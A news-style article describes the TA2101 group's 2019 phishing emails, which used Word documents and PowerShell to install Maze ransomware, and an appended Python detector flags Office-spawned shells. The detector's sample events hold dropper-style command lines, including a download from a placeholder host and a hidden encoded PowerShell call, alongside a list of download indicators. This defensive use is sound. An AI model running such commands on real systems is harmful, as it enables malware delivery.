Usually, these tools are used by companies to identify vulnerabilities and protect their systems. However, other hacking groups such as Cobalt Group, APT32 and APT19 have also been seen using them to develop malware.
Attackers usually begin their attacks with phishing and social engineering techniques and follow up with banking Trojans and ransomware.
The researchers also discovered that the new hacking group TA2101 used the Maze ransomware to attack an Italian company, along with its social engineering techniques.
Exploit Windows via malicious Word documents
The attacks by the TA2101 group were discovered by Proofpoint researchers. The malicious campaign ran between 16 October and 12 November 2019. The hackers sent malicious emails to companies in Germany, Italy and the United States. Their main targets were IT services, construction companies and healthcare organizations.
According to the researchers, most of the emails contained malicious Word documents.
The message urged victims to open the malicious attachment. If users opened the document and allowed it to run, a PowerShell script was executed.
The PowerShell script, in turn, downloaded and installed the Maze ransomware on the victim's device.
The hackers sent different emails to the victims. In some of them, the sender appeared to be the German Federal Ministry of Finance. Victims were told to open the malicious document to find information on how to avoid further taxation and penalties.
Recently, Proofpoint researchers found another email campaign containing malicious Word documents that infected victims' systems with the IcedID banking Trojan.
In that campaign too, the malicious document led to the installation of malware, the IcedID payload, on corporate systems. The main targets of the campaign were healthcare organizations. The infection process was the same as in the recent TA2101 campaign.
The techniques used by this hacking group are sophisticated and show that the attackers are experienced and prepared for many more attacks.
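A defender-side check for the infection chain described above (a Word document launching a PowerShell script that fetches the payload, the same process in both the Maze and the IcedID campaigns), added here as an example and not taken from the article or from Proofpoint's research. It scans process-creation events for an Office application spawning a shell and raises the severity when the command line carries a download or encoded-command indicator; the event field names, the indicator list and the sample events are all assumptions constructed for this example.

```python
import re
from typing import Dict, List, Optional

# Office applications that should rarely spawn a shell or script host directly.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Download / in-memory-execution indicators often seen in droppers (assumed list).
DOWNLOAD_PATTERNS = re.compile(
    r"(downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer|"
    r"\biex\b|invoke-expression|-enc(odedcommand)?\b|frombase64string)",
    re.IGNORECASE,
)

# Constructed process-creation events: field names, hosts, paths and command
# lines are invented for this example and do not follow any real sensor's schema.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "ws-01", "parent_image": r"C:\Office16\WINWORD.EXE", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -w hidden -nop -enc SQBFAFgAIAAo..."},
    {"host": "ws-02", "parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell Get-ChildItem C:\\temp"},
    {"host": "ws-03", "parent_image": r"C:\Office16\EXCEL.EXE", "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd /c powershell (New-Object Net.WebClient).DownloadFile('http://example.invalid/a.exe','a.exe')"},
    {"host": "ws-04", "parent_image": r"C:\Office16\WINWORD.EXE", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -Command Get-Date"},
]

def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event: Dict[str, str]) -> Optional[str]:
    """Return 'high', 'medium' or None for one process-creation event."""
    if basename(event["parent_image"]) not in OFFICE_PARENTS:
        return None
    if basename(event["image"]) not in SHELLS:
        return None  # Office spawning something other than a shell is out of scope here
    if DOWNLOAD_PATTERNS.search(event["command_line"]):
        return "high"  # shell from Office plus a download / encoded-command sign
    return "medium"  # shell from Office without an obvious download indicator

def detect(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Alerts (host, severity, parent, child) for every flagged event, in input order."""
    return [{"host": ev["host"], "severity": classify(ev),
             "parent": basename(ev["parent_image"]), "child": basename(ev["image"])}
            for ev in events if classify(ev)]

if __name__ == "__main__":
    print(detect(SAMPLE_EVENTS))
```

Real deployments would feed this from an EDR or Sysmon process-creation stream and tune the parent and indicator lists to the environment.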